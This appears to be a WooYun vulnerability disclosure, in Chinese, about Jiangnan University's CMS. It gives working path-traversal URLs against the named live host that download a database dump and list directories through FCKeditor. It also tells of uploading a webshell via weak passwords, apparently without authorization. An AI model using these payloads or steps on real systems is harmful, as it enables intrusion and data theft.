WooYun.org

据说作为一个折腾网站的，不搞一下自己学校的网站是不合格的，so，有了下文
cms.jiangnan.edu.cn这个域名看着应该是内容管理系统的后台，访问
http://cms.jiangnan.edu.cn/cms就可以看到后台登陆地址，是一个古老的系统，测试下之前爆出来的漏洞，果然是没有修补上，呵呵呵呵呵。。。
cms.jiangnan.edu.cn/cms/web/downloadFiles.jsp?file=../../../../../../home/cms61.sql
任意文件下载，这个数据库文件不知道是管理员备份的，还是被人拖的
http://cms.jiangnan.edu.cn/cms/editor/filemanager/browser/default/browser.html?Type=../../../../../home/cms61/webapps/cms/&Connector=connectors/jsp/connector
fckeditor的列目录漏洞，可以看到一堆子的webshell。。。

传个shell看看，当然，特色的弱口令是意料当中的

后台真的强大啊。

唉，看着这一片，曾经是多么想留个页面上去的，现在是真老了。看了一眼截个图就出来了。
PS,shell真的不少，都清理一遍吧